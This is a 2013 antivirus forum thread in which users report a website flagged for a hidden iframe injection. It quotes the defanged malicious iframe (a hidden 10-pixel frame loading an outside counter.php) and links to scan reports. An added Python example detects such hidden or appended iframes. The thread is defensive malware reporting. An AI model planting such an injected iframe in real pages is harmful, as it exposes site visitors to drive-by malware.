Author Topic: Again the marvelous avast! Web Shield detects...  (Read 2084 times)


Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33931
  • malware fighter
Again the marvelous avast! Web Shield detects...
« on: December 13, 2013, 12:19:23 AM »
It blocks and detects: JS:Iframe-DOI[Trj] here for this site: htxp://quttera.com/detailed_report/frontporchnewstexas.com
See: https://www.virustotal.com/nl/url/616bb3978b0fd51d23dd2abe8b9c6e678fccb4e92bcc5c0281dc513a81a4b5d7/analysis/
and http://urlquery.net/report.php?id=8358034  with a snort IDS alert Snort Alert [1:27242:2]

IP bad web host-> https://www.virustotal.com/nl/ip-address/97.74.215.194/information/
iFrame check:
Suspicious <iframe src="htxp://rmai.in/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10"
and Injection Check:
Suspicious Text after HTML <iframe src="htxp://rmai.in/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
as detected MW:IFRAME:ENC1560 malware  -> blacklisted http://www.yandex.com/infected?url=frontporchnewstexas.com&l10n=en

Also consider the Sucuri report for this site: http://sitecheck.sucuri.net/results/frontporchnewstexas.com/december1950121111.htm
See: http://jsunpack.jeek.org/?report=90cad0c17bf04a4bbae2dc9ce948cd00bc980e4f -> The requested URL /counter.php was not found on this server.

More unknown google malware on IP: 97.74.215.194 -> http://support.clean-mx.de/clean-mx/viruses.php?sort=firstseen%20desc&review=97.74.215.194

pol

Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
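
An added example, not part of the original posts or of any scanner named in this thread: a small Python check for the two findings the first post lists, a hidden iframe and an iframe appended after the closing `</html>` tag. The 10-pixel threshold, the class and function names, and the sample page are assumptions constructed for illustration; the iframe in the sample is the defanged one quoted in the post.

```python
import re
from html.parser import HTMLParser

HIDDEN_CSS = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
MAX_TINY_PX = 10  # assumed threshold: frames this small are not meant to be seen

def _px(value):
    """Return the leading integer of a width/height attribute, or None."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None

class IframeAudit(HTMLParser):
    """Collects (reason, src) findings for the iframes in one HTML document."""
    def __init__(self):
        super().__init__()
        self.after_html = False  # set once </html> has been seen
        self.findings = []

    def handle_endtag(self, tag):
        if tag == "html":
            self.after_html = True

    def handle_starttag(self, tag, attrs):
        # Self-closing <iframe .../> also arrives here via handle_startendtag.
        if tag != "iframe":
            return
        a = dict(attrs)
        src = a.get("src") or ""
        if self.after_html:
            self.findings.append(("iframe after </html>", src))
        if HIDDEN_CSS.search(a.get("style") or ""):
            self.findings.append(("hidden by CSS", src))
        dims = [_px(a.get("width")), _px(a.get("height"))]
        if any(d is not None and d <= MAX_TINY_PX for d in dims):
            self.findings.append(("tiny frame", src))

def audit(html_text):
    """Parse html_text and return the list of (reason, src) findings."""
    parser = IframeAudit()
    parser.feed(html_text)
    parser.close()
    return parser.findings

# Constructed sample: a clean page with the iframe from the report appended.
CLEAN = ('<html><body><p>Local news</p>'
         '<iframe src="/map.html" width="600" height="400"></iframe></body></html>')
SAMPLE = CLEAN + ('\n<iframe src="htxp://rmai.in/counter.php" style="visibility: hidden; '
                  'position: absolute; left: 0px; top: 0px" width="10" height="10"/>')

if __name__ == "__main__":
    print(*audit(SAMPLE), sep="\n")
```

The visible 600x400 frame inside the document body produces no finding; the appended frame is reported once for each of the three reasons.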

Offline Secondmineboy

  • Avast Evangelist
  • Massive Poster
  • ***
  • Posts: 3645
Windows 10 1909, 4 GB DDR3 RAM, 500 GB 5400 RPM HDD, 1366 by 768 LCD Screen, Intel Core i3 5010U Dual Core, Intel HD Graphics 5500
HUAWEI P30 Pro. Android 10

Offline polonus

Re: Again the marvelous avast! Web Shield detects...
« Reply #2 on: December 13, 2013, 12:41:54 AM »
Hi Steven Winderlich,

Thanks for checking, but click through and the overall situation is better still, 18 now to flag the scan results: https://www.virustotal.com/nl/file/3861d5fe92fce0d1760eb7c11599a1d0284417913c19d549e6b174ef4a8e9479/analysis/1386552730/
and avast! as HTML:Iframe-ZG [Trj]
But Web Shield detection is to be preferred as it detects and blocks, so the old OS and the browser never connect out and do not even have a chance to contact the malcode at hand. But to be sure, I always perform a full scan of the browser cache etc. in the aftermath for "flag remainders of encountering malcode" even when run in a VM or sandbox. Just to be absolutely sure ;)

Damian


Offline Secondmineboy

Re: Again the marvelous avast! Web Shield detects...
« Reply #3 on: December 13, 2013, 12:44:48 AM »
That scan is 4 days old, can you make a fresh one? ;)

It's funny that Kaspersky displays a message that a phishing link in IE can be used to steal personal information, AND IT DETECTS THE SCRIPT MALWARE, but it's not blocked completely.

Offline polonus

Re: Again the marvelous avast! Web Shield detects...
« Reply #4 on: December 13, 2013, 12:54:33 AM »
Read here: http://webcache.googleusercontent.com/search?q=cache:8gu23oEUsKQJ:www.viruss.eu/virus-alert/malware-entry-mwiframeenc1560/+&cd=1&hl=nl&ct=clnk&gl=nl
Right as it says:  N.B.
Quote
that every PHP, HTML and JS file gets compromised by this malware
quote from above link - source av robot
This info underlines your comment!

polonus